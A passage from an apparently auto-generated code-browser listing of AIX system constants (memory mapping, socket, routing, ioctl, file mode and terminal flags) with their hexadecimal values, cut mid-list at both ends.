(line 449) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 450) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 451) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 452) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 453) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 454) | MAP_ANON = 0x10 constant MAP_ANONYMOUS (line 455) | MAP_ANONYMOUS = 0x10 constant MAP_FILE (line 456) | MAP_FILE = 0x0 constant MAP_FIXED (line 457) | MAP_FIXED = 0x100 constant MAP_PRIVATE (line 458) | MAP_PRIVATE = 0x2 constant MAP_SHARED (line 459) | MAP_SHARED = 0x1 constant MAP_TYPE (line 460) | MAP_TYPE = 0xf0 constant MAP_VARIABLE (line 461) | MAP_VARIABLE = 0x0 constant MCAST_BLOCK_SOURCE (line 462) | MCAST_BLOCK_SOURCE = 0x40 constant MCAST_EXCLUDE (line 463) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 464) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 465) | MCAST_JOIN_GROUP = 0x3e constant MCAST_JOIN_SOURCE_GROUP (line 466) | MCAST_JOIN_SOURCE_GROUP = 0x42 constant MCAST_LEAVE_GROUP (line 467) | MCAST_LEAVE_GROUP = 0x3f constant MCAST_LEAVE_SOURCE_GROUP (line 468) | MCAST_LEAVE_SOURCE_GROUP = 0x43 constant MCAST_SOURCE_FILTER (line 469) | MCAST_SOURCE_FILTER = 0x49 constant MCAST_UNBLOCK_SOURCE (line 470) | MCAST_UNBLOCK_SOURCE = 0x41 constant MCL_CURRENT (line 471) | MCL_CURRENT = 0x100 constant MCL_FUTURE (line 472) | MCL_FUTURE = 0x200 constant MSG_ANY (line 473) | MSG_ANY = 0x4 constant MSG_ARGEXT (line 474) | MSG_ARGEXT = 0x400 constant MSG_BAND (line 475) | MSG_BAND = 0x2 constant MSG_COMPAT (line 476) | MSG_COMPAT = 0x8000 constant MSG_CTRUNC (line 477) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 478) | MSG_DONTROUTE = 0x4 constant MSG_EOR (line 479) | MSG_EOR = 0x8 constant MSG_HIPRI (line 480) | MSG_HIPRI = 0x1 constant MSG_MAXIOVLEN (line 481) | MSG_MAXIOVLEN = 0x10 constant MSG_MPEG2 (line 482) | MSG_MPEG2 = 0x80 constant MSG_NONBLOCK (line 483) | MSG_NONBLOCK = 0x4000 constant MSG_NOSIGNAL (line 484) | MSG_NOSIGNAL = 0x100 constant MSG_OOB (line 485) | MSG_OOB = 0x1 constant MSG_PEEK (line 486) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 487) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 488) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 489) | MSG_WAITFORONE = 0x200 constant MS_ASYNC (line 490) | MS_ASYNC = 0x10 constant MS_EINTR (line 491) | MS_EINTR = 0x80 constant MS_INVALIDATE (line 492) | MS_INVALIDATE = 0x40 constant MS_PER_SEC (line 493) | MS_PER_SEC = 0x3e8 constant MS_SYNC (line 494) | MS_SYNC = 0x20 constant NFDBITS (line 495) | NFDBITS = 0x20 constant NL0 (line 496) | NL0 = 0x0 constant NL1 (line 497) | NL1 = 0x4000 constant NL2 (line 498) | NL2 = 0x8000 constant NL3 (line 499) | NL3 = 0xc000 constant NLDLY (line 500) | NLDLY = 0x4000 constant NOFLSH (line 501) | NOFLSH = 0x80 constant NOFLUSH (line 502) | NOFLUSH = 0x80000000 constant OCRNL (line 503) | OCRNL = 0x8 constant OFDEL (line 504) | OFDEL = 0x80 constant OFILL (line 505) | OFILL = 0x40 constant OLCUC (line 506) | OLCUC = 0x2 constant ONLCR (line 507) | ONLCR = 0x4 constant ONLRET (line 508) | ONLRET = 0x20 constant ONOCR (line 509) | ONOCR = 0x10 constant ONOEOT (line 510) | ONOEOT = 0x80000 constant OPOST (line 511) | OPOST = 0x1 constant OXTABS (line 512) | OXTABS = 0x40000 constant O_ACCMODE (line 513) | O_ACCMODE = 0x23 constant O_APPEND (line 514) | O_APPEND = 0x8 constant O_CIO (line 515) | O_CIO = 0x80 constant O_CIOR (line 516) | O_CIOR = 0x800000000 constant O_CLOEXEC (line 517) | O_CLOEXEC = 0x800000 constant O_CREAT (line 518) | O_CREAT = 0x100 constant O_DEFER (line 519) | O_DEFER = 0x2000 constant O_DELAY (line 520) | O_DELAY = 0x4000 constant O_DIRECT (line 521) | O_DIRECT = 0x8000000 constant O_DIRECTORY (line 522) | O_DIRECTORY = 0x80000 constant O_DSYNC (line 523) | O_DSYNC = 0x400000 constant O_EFSOFF (line 524) | O_EFSOFF = 0x400000000 constant O_EFSON (line 525) | O_EFSON = 0x200000000 constant O_EXCL (line 526) | O_EXCL = 0x400 constant O_EXEC (line 527) | O_EXEC = 0x20 constant O_LARGEFILE (line 528) | O_LARGEFILE = 0x4000000 constant O_NDELAY (line 529) | O_NDELAY = 0x8000 constant O_NOCACHE (line 530) | O_NOCACHE = 0x100000 constant O_NOCTTY (line 531) | O_NOCTTY = 0x800 constant O_NOFOLLOW (line 532) | O_NOFOLLOW = 0x1000000 constant O_NONBLOCK (line 533) | O_NONBLOCK = 0x4 constant O_NONE (line 534) | O_NONE = 0x3 constant O_NSHARE (line 535) | O_NSHARE = 0x10000 constant O_RAW (line 536) | O_RAW = 0x100000000 constant O_RDONLY (line 537) | O_RDONLY = 0x0 constant O_RDWR (line 538) | O_RDWR = 0x2 constant O_RSHARE (line 539) | O_RSHARE = 0x1000 constant O_RSYNC (line 540) | O_RSYNC = 0x200000 constant O_SEARCH (line 541) | O_SEARCH = 0x20 constant O_SNAPSHOT (line 542) | O_SNAPSHOT = 0x40 constant O_SYNC (line 543) | O_SYNC = 0x10 constant O_TRUNC (line 544) | O_TRUNC = 0x200 constant O_TTY_INIT (line 545) | O_TTY_INIT = 0x0 constant O_WRONLY (line 546) | O_WRONLY = 0x1 constant PARENB (line 547) | PARENB = 0x100 constant PAREXT (line 548) | PAREXT = 0x100000 constant PARMRK (line 549) | PARMRK = 0x8 constant PARODD (line 550) | PARODD = 0x200 constant PENDIN (line 551) | PENDIN = 0x20000000 constant PRIO_PGRP (line 552) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 553) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 554) | PRIO_USER = 0x2 constant PROT_EXEC (line 555) | PROT_EXEC = 0x4 constant PROT_NONE (line 556) | PROT_NONE = 0x0 constant PROT_READ (line 557) | PROT_READ = 0x1 constant PROT_WRITE (line 558) | PROT_WRITE = 0x2 constant PR_64BIT (line 559) | PR_64BIT = 0x20 constant PR_ADDR (line 560) | PR_ADDR = 0x2 constant PR_ARGEXT (line 561) | PR_ARGEXT = 0x400 constant PR_ATOMIC (line 562) | PR_ATOMIC = 0x1 constant PR_CONNREQUIRED (line 563) | PR_CONNREQUIRED = 0x4 constant PR_FASTHZ (line 564) | PR_FASTHZ = 0x5 constant PR_INP (line 565) | PR_INP = 0x40 constant PR_INTRLEVEL (line 566) | PR_INTRLEVEL = 0x8000 constant PR_MLS (line 567) | PR_MLS = 0x100 constant PR_MLS_1_LABEL (line 568) | PR_MLS_1_LABEL = 0x200 constant PR_NOEOR (line 569) | PR_NOEOR = 0x4000 constant PR_RIGHTS (line 570) | PR_RIGHTS = 0x10 constant PR_SLOWHZ (line 571) | PR_SLOWHZ = 0x2 constant PR_WANTRCVD (line 572) | PR_WANTRCVD = 0x8 constant RLIMIT_AS (line 573) | RLIMIT_AS = 0x6 constant RLIMIT_CORE (line 574) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 575) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 576) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 577) | RLIMIT_FSIZE = 0x1 constant RLIMIT_NOFILE (line 578) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 579) | RLIMIT_NPROC = 0x9 constant RLIMIT_RSS (line 580) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 581) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 582) | RLIM_INFINITY = 0x7fffffff constant RTAX_AUTHOR (line 583) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 584) | RTAX_BRD = 0x7 constant RTAX_DST (line 585) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 586) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 587) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 588) | RTAX_IFA = 0x5 constant RTAX_IFP (line 589) | RTAX_IFP = 0x4 constant RTAX_MAX (line 590) | RTAX_MAX = 0x8 constant RTAX_NETMASK (line 591) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 592) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 593) | RTA_BRD = 0x80 constant RTA_DOWNSTREAM (line 594) | RTA_DOWNSTREAM = 0x100 constant RTA_DST (line 595) | RTA_DST = 0x1 constant RTA_GATEWAY (line 596) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 597) | RTA_GENMASK = 0x8 constant RTA_IFA (line 598) | RTA_IFA = 0x20 constant RTA_IFP (line 599) | RTA_IFP = 0x10 constant RTA_NETMASK (line 600) | RTA_NETMASK = 0x4 constant RTC_IA64 (line 601) | RTC_IA64 = 0x3 constant RTC_POWER (line 602) | RTC_POWER = 0x1 constant RTC_POWER_PC (line 603) | RTC_POWER_PC = 0x2 constant RTF_ACTIVE_DGD (line 604) | RTF_ACTIVE_DGD = 0x1000000 constant RTF_BCE (line 605) | RTF_BCE = 0x80000 constant RTF_BLACKHOLE (line 606) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 607) | RTF_BROADCAST = 0x400000 constant RTF_BUL (line 608) | RTF_BUL = 0x2000 constant RTF_CLONE (line 609) | RTF_CLONE = 0x10000 constant RTF_CLONED (line 610) | RTF_CLONED = 0x20000 constant RTF_CLONING (line 611) | RTF_CLONING = 0x100 constant RTF_DONE (line 612) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 613) | RTF_DYNAMIC = 0x10 constant RTF_FREE_IN_PROG (line 614) | RTF_FREE_IN_PROG = 0x4000000 constant RTF_GATEWAY (line 615) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 616) | RTF_HOST = 0x4 constant RTF_LLINFO (line 617) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 618) | RTF_LOCAL = 0x200000 constant RTF_MASK (line 619) | RTF_MASK = 0x80 constant RTF_MODIFIED (line 620) | RTF_MODIFIED = 0x20 constant RTF_MULTICAST (line 621) | RTF_MULTICAST = 0x800000 constant RTF_PERMANENT6 (line 622) | RTF_PERMANENT6 = 0x8000000 constant RTF_PINNED (line 623) | RTF_PINNED = 0x100000 constant RTF_PROTO1 (line 624) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 625) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 626) | RTF_PROTO3 = 0x40000 constant RTF_REJECT (line 627) | RTF_REJECT = 0x8 constant RTF_SMALLMTU (line 628) | RTF_SMALLMTU = 0x40000 constant RTF_STATIC (line 629) | RTF_STATIC = 0x800 constant RTF_STOPSRCH (line 630) | RTF_STOPSRCH = 0x2000000 constant RTF_UNREACHABLE (line 631) | RTF_UNREACHABLE = 0x10000000 constant RTF_UP (line 632) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 633) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 634) | RTM_ADD = 0x1 constant RTM_CHANGE (line 635) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 636) | RTM_DELADDR = 0xd constant RTM_DELETE (line 637) | RTM_DELETE = 0x2 constant RTM_EXPIRE (line 638) | RTM_EXPIRE = 0xf constant RTM_GET (line 639) | RTM_GET = 0x4 constant RTM_GETNEXT (line 640) | RTM_GETNEXT = 0x11 constant RTM_IFINFO (line 641) | RTM_IFINFO = 0xe constant RTM_LOCK (line 642) | RTM_LOCK = 0x8 constant RTM_LOSING (line 643) | RTM_LOSING = 0x5 constant RTM_MISS (line 644) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 645) | RTM_NEWADDR = 0xc constant RTM_OLDADD (line 646) | RTM_OLDADD = 0x9 constant RTM_OLDDEL (line 647) | RTM_OLDDEL = 0xa constant RTM_REDIRECT (line 648) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 649) | RTM_RESOLVE = 0xb constant RTM_RTLOST (line 650) | RTM_RTLOST = 0x10 constant RTM_RTTUNIT (line 651) | RTM_RTTUNIT = 0xf4240 constant RTM_SAMEADDR (line 652) | RTM_SAMEADDR = 0x12 constant RTM_SET (line 653) | RTM_SET = 0x13 constant RTM_VERSION (line 654) | RTM_VERSION = 0x2 constant RTM_VERSION_GR (line 655) | RTM_VERSION_GR = 0x4 constant RTM_VERSION_GR_COMPAT (line 656) | RTM_VERSION_GR_COMPAT = 0x3 constant RTM_VERSION_POLICY (line 657) | RTM_VERSION_POLICY = 0x5 constant RTM_VERSION_POLICY_EXT (line 658) | RTM_VERSION_POLICY_EXT = 0x6 constant RTM_VERSION_POLICY_PRFN (line 659) | RTM_VERSION_POLICY_PRFN = 0x7 constant RTV_EXPIRE (line 660) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 661) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 662) | RTV_MTU = 0x1 constant RTV_RPIPE (line 663) | RTV_RPIPE = 0x8 constant RTV_RTT (line 664) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 665) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 666) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 667) | RTV_SSTHRESH = 0x20 constant RUSAGE_CHILDREN (line 668) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 669) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 670) | RUSAGE_THREAD = 0x1 constant SCM_RIGHTS (line 671) | SCM_RIGHTS = 0x1 constant SHUT_RD (line 672) | SHUT_RD = 0x0 constant SHUT_RDWR (line 673) | SHUT_RDWR = 0x2 constant SHUT_WR (line 674) | SHUT_WR = 0x1 constant SIGMAX64 (line 675) | SIGMAX64 = 0xff constant SIGQUEUE_MAX (line 676) | SIGQUEUE_MAX = 0x20 constant SIOCADDIFVIPA (line 677) | SIOCADDIFVIPA = 0x20006942 constant SIOCADDMTU (line 678) | SIOCADDMTU = -0x7ffb9690 constant SIOCADDMULTI (line 679) | SIOCADDMULTI = -0x7fdf96cf constant SIOCADDNETID (line 680) | SIOCADDNETID = -0x7fd796a9 constant SIOCADDRT (line 681) | SIOCADDRT = -0x7fcf8df6 constant SIOCAIFADDR (line 682) | SIOCAIFADDR = -0x7fbf96e6 constant SIOCATMARK (line 683) | SIOCATMARK = 0x40047307 constant SIOCDARP (line 684) | SIOCDARP = -0x7fb396e0 constant SIOCDELIFVIPA (line 685) | SIOCDELIFVIPA = 0x20006943 constant SIOCDELMTU (line 686) | SIOCDELMTU = -0x7ffb968f constant SIOCDELMULTI (line 687) | SIOCDELMULTI = -0x7fdf96ce constant SIOCDELPMTU (line 688) | SIOCDELPMTU = -0x7fd78ff6 constant SIOCDELRT (line 689) | SIOCDELRT = -0x7fcf8df5 constant SIOCDIFADDR (line 690) | SIOCDIFADDR = -0x7fd796e7 constant SIOCDNETOPT (line 691) | SIOCDNETOPT = -0x3ffe9680 constant SIOCDX25XLATE (line 692) | SIOCDX25XLATE = -0x7fd7969b constant SIOCFIFADDR (line 693) | SIOCFIFADDR = -0x7fdf966d constant SIOCGARP (line 694) | SIOCGARP = -0x3fb396da constant SIOCGETMTUS (line 695) | SIOCGETMTUS = 0x2000696f constant SIOCGETSGCNT (line 696) | SIOCGETSGCNT = -0x3feb8acc constant SIOCGETVIFCNT (line 697) | SIOCGETVIFCNT = -0x3feb8acd constant SIOCGHIWAT (line 698) | SIOCGHIWAT = 0x40047301 constant SIOCGIFADDR (line 699) | SIOCGIFADDR = -0x3fd796df constant SIOCGIFADDRS (line 700) | SIOCGIFADDRS = 0x2000698c constant SIOCGIFBAUDRATE (line 701) | SIOCGIFBAUDRATE = -0x3fdf9669 constant SIOCGIFBRDADDR (line 702) | SIOCGIFBRDADDR = -0x3fd796dd constant SIOCGIFCONF (line 703) | SIOCGIFCONF = -0x3ff796bb constant SIOCGIFCONFGLOB (line 704) | SIOCGIFCONFGLOB = -0x3ff79670 constant SIOCGIFDSTADDR (line 705) | SIOCGIFDSTADDR = -0x3fd796de constant SIOCGIFFLAGS (line 706) | SIOCGIFFLAGS = -0x3fd796ef constant SIOCGIFGIDLIST (line 707) | SIOCGIFGIDLIST = 0x20006968 constant SIOCGIFHWADDR (line 708) | SIOCGIFHWADDR = -0x3fab966b constant SIOCGIFMETRIC (line 709) | SIOCGIFMETRIC = -0x3fd796e9 constant SIOCGIFMTU (line 710) | SIOCGIFMTU = -0x3fd796aa constant SIOCGIFNETMASK (line 711) | SIOCGIFNETMASK = -0x3fd796db constant SIOCGIFOPTIONS (line 712) | SIOCGIFOPTIONS = -0x3fd796d6 constant SIOCGISNO (line 713) | SIOCGISNO = -0x3fd79695 constant SIOCGLOADF (line 714) | SIOCGLOADF = -0x3ffb967e constant SIOCGLOWAT (line 715) | SIOCGLOWAT = 0x40047303 constant SIOCGNETOPT (line 716) | SIOCGNETOPT = -0x3ffe96a5 constant SIOCGNETOPT1 (line 717) | SIOCGNETOPT1 = -0x3fdf967f constant SIOCGNMTUS (line 718) | SIOCGNMTUS = 0x2000696e constant SIOCGPGRP (line 719) | SIOCGPGRP = 0x40047309 constant SIOCGSIZIFCONF (line 720) | SIOCGSIZIFCONF = 0x4004696a constant SIOCGSRCFILTER (line 721) | SIOCGSRCFILTER = -0x3fe796cb constant SIOCGTUNEPHASE (line 722) | SIOCGTUNEPHASE = -0x3ffb9676 constant SIOCGX25XLATE (line 723) | SIOCGX25XLATE = -0x3fd7969c constant SIOCIFATTACH (line 724) | SIOCIFATTACH = -0x7fdf9699 constant SIOCIFDETACH (line 725) | SIOCIFDETACH = -0x7fdf969a constant SIOCIFGETPKEY (line 726) | SIOCIFGETPKEY = -0x7fdf969b constant SIOCIF_ATM_DARP (line 727) | SIOCIF_ATM_DARP = -0x7fdf9683 constant SIOCIF_ATM_DUMPARP (line 728) | SIOCIF_ATM_DUMPARP = -0x7fdf9685 constant SIOCIF_ATM_GARP (line 729) | SIOCIF_ATM_GARP = -0x7fdf9682 constant SIOCIF_ATM_IDLE (line 730) | SIOCIF_ATM_IDLE = -0x7fdf9686 constant SIOCIF_ATM_SARP (line 731) | SIOCIF_ATM_SARP = -0x7fdf9681 constant SIOCIF_ATM_SNMPARP (line 732) | SIOCIF_ATM_SNMPARP = -0x7fdf9687 constant SIOCIF_ATM_SVC (line 733) | SIOCIF_ATM_SVC = -0x7fdf9684 constant SIOCIF_ATM_UBR (line 734) | SIOCIF_ATM_UBR = -0x7fdf9688 constant SIOCIF_DEVHEALTH (line 735) | SIOCIF_DEVHEALTH = -0x7ffb966c constant SIOCIF_IB_ARP_INCOMP (line 736) | SIOCIF_IB_ARP_INCOMP = -0x7fdf9677 constant SIOCIF_IB_ARP_TIMER (line 737) | SIOCIF_IB_ARP_TIMER = -0x7fdf9678 constant SIOCIF_IB_CLEAR_PINFO (line 738) | SIOCIF_IB_CLEAR_PINFO = -0x3fdf966f constant SIOCIF_IB_DEL_ARP (line 739) | SIOCIF_IB_DEL_ARP = -0x7fdf967f constant SIOCIF_IB_DEL_PINFO (line 740) | SIOCIF_IB_DEL_PINFO = -0x3fdf9670 constant SIOCIF_IB_DUMP_ARP (line 741) | SIOCIF_IB_DUMP_ARP = -0x7fdf9680 constant SIOCIF_IB_GET_ARP (line 742) | SIOCIF_IB_GET_ARP = -0x7fdf967e constant SIOCIF_IB_GET_INFO (line 743) | SIOCIF_IB_GET_INFO = -0x3f879675 constant SIOCIF_IB_GET_STATS (line 744) | SIOCIF_IB_GET_STATS = -0x3f879672 constant SIOCIF_IB_NOTIFY_ADDR_REM (line 745) | SIOCIF_IB_NOTIFY_ADDR_REM = -0x3f87966a constant SIOCIF_IB_RESET_STATS (line 746) | SIOCIF_IB_RESET_STATS = -0x3f879671 constant SIOCIF_IB_RESIZE_CQ (line 747) | SIOCIF_IB_RESIZE_CQ = -0x7fdf9679 constant SIOCIF_IB_SET_ARP (line 748) | SIOCIF_IB_SET_ARP = -0x7fdf967d constant SIOCIF_IB_SET_PKEY (line 749) | SIOCIF_IB_SET_PKEY = -0x7fdf967c constant SIOCIF_IB_SET_PORT (line 750) | SIOCIF_IB_SET_PORT = -0x7fdf967b constant SIOCIF_IB_SET_QKEY (line 751) | SIOCIF_IB_SET_QKEY = -0x7fdf9676 constant SIOCIF_IB_SET_QSIZE (line 752) | SIOCIF_IB_SET_QSIZE = -0x7fdf967a constant SIOCLISTIFVIPA (line 753) | SIOCLISTIFVIPA = 0x20006944 constant SIOCSARP (line 754) | SIOCSARP = -0x7fb396e2 constant SIOCSHIWAT (line 755) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 756) | SIOCSIFADDR = -0x7fd796f4 constant SIOCSIFADDRORI (line 757) | SIOCSIFADDRORI = -0x7fdb9673 constant SIOCSIFBRDADDR (line 758) | SIOCSIFBRDADDR = -0x7fd796ed constant SIOCSIFDSTADDR (line 759) | SIOCSIFDSTADDR = -0x7fd796f2 constant SIOCSIFFLAGS (line 760) | SIOCSIFFLAGS = -0x7fd796f0 constant SIOCSIFGIDLIST (line 761) | SIOCSIFGIDLIST = 0x20006969 constant SIOCSIFMETRIC (line 762) | SIOCSIFMETRIC = -0x7fd796e8 constant SIOCSIFMTU (line 763) | SIOCSIFMTU = -0x7fd796a8 constant SIOCSIFNETDUMP (line 764) | SIOCSIFNETDUMP = -0x7fd796e4 constant SIOCSIFNETMASK (line 765) | SIOCSIFNETMASK = -0x7fd796ea constant SIOCSIFOPTIONS (line 766) | SIOCSIFOPTIONS = -0x7fd796d7 constant SIOCSIFSUBCHAN (line 767) | SIOCSIFSUBCHAN = -0x7fd796e5 constant SIOCSISNO (line 768) | SIOCSISNO = -0x7fd79694 constant SIOCSLOADF (line 769) | SIOCSLOADF = -0x3ffb967d constant SIOCSLOWAT (line 770) | SIOCSLOWAT = 0x80047302 constant SIOCSNETOPT (line 771) | SIOCSNETOPT = -0x7ffe96a6 constant SIOCSPGRP (line 772) | SIOCSPGRP = 0x80047308 constant SIOCSX25XLATE (line 773) | SIOCSX25XLATE = -0x7fd7969d constant SOCK_CONN_DGRAM (line 774) | SOCK_CONN_DGRAM = 0x6 constant SOCK_DGRAM (line 775) | SOCK_DGRAM = 0x2 constant SOCK_RAW (line 776) | SOCK_RAW = 0x3 constant SOCK_RDM (line 777) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 778) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 779) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 780) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 781) | SOMAXCONN = 0x400 constant SO_ACCEPTCONN (line 782) | SO_ACCEPTCONN = 0x2 constant SO_AUDIT (line 783) | SO_AUDIT = 0x8000 constant SO_BROADCAST (line 784) | SO_BROADCAST = 0x20 constant SO_CKSUMRECV (line 785) | SO_CKSUMRECV = 0x800 constant SO_DEBUG (line 786) | SO_DEBUG = 0x1 constant SO_DONTROUTE (line 787) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 788) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 789) | SO_KEEPALIVE = 0x8 constant SO_KERNACCEPT (line 790) | SO_KERNACCEPT = 0x2000 constant SO_LINGER (line 791) | SO_LINGER = 0x80 constant SO_NOMULTIPATH (line 792) | SO_NOMULTIPATH = 0x4000 constant SO_NOREUSEADDR (line 793) | SO_NOREUSEADDR = 0x1000 constant SO_OOBINLINE (line 794) | SO_OOBINLINE = 0x100 constant SO_PEERID (line 795) | SO_PEERID = 0x1009 constant SO_RCVBUF (line 796) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 797) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 798) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 799) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 800) | SO_REUSEPORT = 0x200 constant SO_SNDBUF (line 801) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 802) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 803) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMPNS (line 804) | SO_TIMESTAMPNS = 0x100a constant SO_TYPE (line 805) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 806) | SO_USELOOPBACK = 0x40 constant SO_USE_IFBUFS (line 807) | SO_USE_IFBUFS = 0x400 constant S_BANDURG (line 808) | S_BANDURG = 0x400 constant S_EMODFMT (line 809) | S_EMODFMT = 0x3c000000 constant S_ENFMT (line 810) | S_ENFMT = 0x400 constant S_ERROR (line 811) | S_ERROR = 0x100 constant S_HANGUP (line 812) | S_HANGUP = 0x200 constant S_HIPRI (line 813) | S_HIPRI = 0x2 constant S_ICRYPTO (line 814) | S_ICRYPTO = 0x80000 constant S_IEXEC (line 815) | S_IEXEC = 0x40 constant S_IFBLK (line 816) | S_IFBLK = 0x6000 constant S_IFCHR (line 817) | S_IFCHR = 0x2000 constant S_IFDIR (line 818) | S_IFDIR = 0x4000 constant S_IFIFO (line 819) | S_IFIFO = 0x1000 constant S_IFJOURNAL (line 820) | S_IFJOURNAL = 0x10000 constant S_IFLNK (line 821) | S_IFLNK = 0xa000 constant S_IFMPX (line 822) | S_IFMPX = 0x2200 constant S_IFMT (line 823) | S_IFMT = 0xf000 constant S_IFPDIR (line 824) | S_IFPDIR = 0x4000000 constant S_IFPSDIR (line 825) | S_IFPSDIR = 0x8000000 constant S_IFPSSDIR (line 826) | S_IFPSSDIR = 0xc000000 constant S_IFREG (line 827) | S_IFREG = 0x8000 constant S_IFSOCK (line 828) | S_IFSOCK = 0xc000 constant S_IFSYSEA (line 829) | S_IFSYSEA = 0x30000000 constant S_INPUT (line 830) | S_INPUT = 0x1 constant S_IREAD (line 831) | S_IREAD = 0x100 constant S_IRGRP (line 832) | S_IRGRP = 0x20 constant S_IROTH (line 833) | S_IROTH = 0x4 constant S_IRUSR (line 834) | S_IRUSR = 0x100 constant S_IRWXG (line 835) | S_IRWXG = 0x38 constant S_IRWXO (line 836) | S_IRWXO = 0x7 constant S_IRWXU (line 837) | S_IRWXU = 0x1c0 constant S_ISGID (line 838) | S_ISGID = 0x400 constant S_ISUID (line 839) | S_ISUID = 0x800 constant S_ISVTX (line 840) | S_ISVTX = 0x200 constant S_ITCB (line 841) | S_ITCB = 0x1000000 constant S_ITP (line 842) | S_ITP = 0x800000 constant S_IWGRP (line 843) | S_IWGRP = 0x10 constant S_IWOTH (line 844) | S_IWOTH = 0x2 constant S_IWRITE (line 845) | S_IWRITE = 0x80 constant S_IWUSR (line 846) | S_IWUSR = 0x80 constant S_IXACL (line 847) | S_IXACL = 0x2000000 constant S_IXATTR (line 848) | S_IXATTR = 0x40000 constant S_IXGRP (line 849) | S_IXGRP = 0x8 constant S_IXINTERFACE (line 850) | S_IXINTERFACE = 0x100000 constant S_IXMOD (line 851) | S_IXMOD = 0x40000000 constant S_IXOTH (line 852) | S_IXOTH = 0x1 constant S_IXUSR (line 853) | S_IXUSR = 0x40 constant S_MSG (line 854) | S_MSG = 0x8 constant S_OUTPUT (line 855) | S_OUTPUT = 0x4 constant S_RDBAND (line 856) | S_RDBAND = 0x20 constant S_RDNORM (line 857) | S_RDNORM = 0x10 constant S_RESERVED1 (line 858) | S_RESERVED1 = 0x20000 constant S_RESERVED2 (line 859) | S_RESERVED2 = 0x200000 constant S_RESERVED3 (line 860) | S_RESERVED3 = 0x400000 constant S_RESERVED4 (line 861) | S_RESERVED4 = 0x80000000 constant S_RESFMT1 (line 862) | S_RESFMT1 = 0x10000000 constant S_RESFMT10 (line 863) | S_RESFMT10 = 0x34000000 constant S_RESFMT11 (line 864) | S_RESFMT11 = 0x38000000 constant S_RESFMT12 (line 865) | S_RESFMT12 = 0x3c000000 constant S_RESFMT2 (line 866) | S_RESFMT2 = 0x14000000 constant S_RESFMT3 (line 867) | S_RESFMT3 = 0x18000000 constant S_RESFMT4 (line 868) | S_RESFMT4 = 0x1c000000 constant S_RESFMT5 (line 869) | S_RESFMT5 = 0x20000000 constant S_RESFMT6 (line 870) | S_RESFMT6 = 0x24000000 constant S_RESFMT7 (line 871) | S_RESFMT7 = 0x28000000 constant S_RESFMT8 (line 872) | S_RESFMT8 = 0x2c000000 constant S_WRBAND (line 873) | S_WRBAND = 0x80 constant S_WRNORM (line 874) | S_WRNORM = 0x40 constant TAB0 (line 875) | TAB0 = 0x0 constant TAB1 (line 876) | TAB1 = 0x400 constant TAB2 (line 877) | TAB2 = 0x800 constant TAB3 (line 878) | TAB3 = 0xc00 constant TABDLY (line 879) | TABDLY = 0xc00 constant TCFLSH (line 880) | TCFLSH = 0x540c constant TCGETA (line 881) | TCGETA = 0x5405 constant TCGETS (line 882) | TCGETS = 0x5401 constant TCIFLUSH (line 883) | TCIFLUSH = 0x0 constant TCIOFF (line 884) | TCIOFF = 0x2 constant TCIOFLUSH (line 885) | TCIOFLUSH = 0x2 constant TCION (line 886) | TCION = 0x3 constant TCOFLUSH (line 887) | TCOFLUSH = 0x1 constant TCOOFF (line 888) | TCOOFF = 0x0 constant TCOON (line 889) | TCOON = 0x1 constant 